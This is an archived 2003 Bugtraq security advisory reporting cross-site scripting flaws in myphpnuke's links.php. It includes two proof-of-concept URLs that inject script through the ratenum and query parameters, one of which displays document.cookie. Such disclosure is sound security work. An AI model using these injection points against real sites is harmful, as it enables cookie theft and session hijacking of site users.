[28947] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

myphpnuke xss

daemon@ATHENA.MIT.EDU (Tacettin Karadeniz)
Thu Feb 20 08:46:24 2003

Message-ID: <20030220014010.90612.qmail@web21303.mail.yahoo.com>
Date: Wed, 19 Feb 2003 17:40:10 -0800 (PST)
From: Tacettin Karadeniz <tacettinkaradeniz@yahoo.com>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

Vendor:
http://www.myphpnuke.com

Subject: 
myphpnuke links.php vulnerability

myphpnuke is a website portal tool written in php.
There are many Cross Site Scripting issue on myphpnuke
.

Example:
http://WEB/myphpnuke/links.php?op=MostPopular&ratenum=[scr!pt]alert(document.cookie);[/scr!pt]&ratetype=percent

http://WEB/myphpnuke/links.php?op=search&query=[scr!pt]alert('tacettin@olympos.org');[/scr!pt]?query=

__________________________________________________
Do you Yahoo!?
Yahoo! Shopping - Send Flowers for Valentine's Day
http://shopping.yahoo.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[28947] in bugtraq

myphpnuke xss

daemon@ATHENA.MIT.EDU (Tacettin Karadeniz)Thu Feb 20 08:46:24 2003

daemon@ATHENA.MIT.EDU (Tacettin Karadeniz)
Thu Feb 20 08:46:24 2003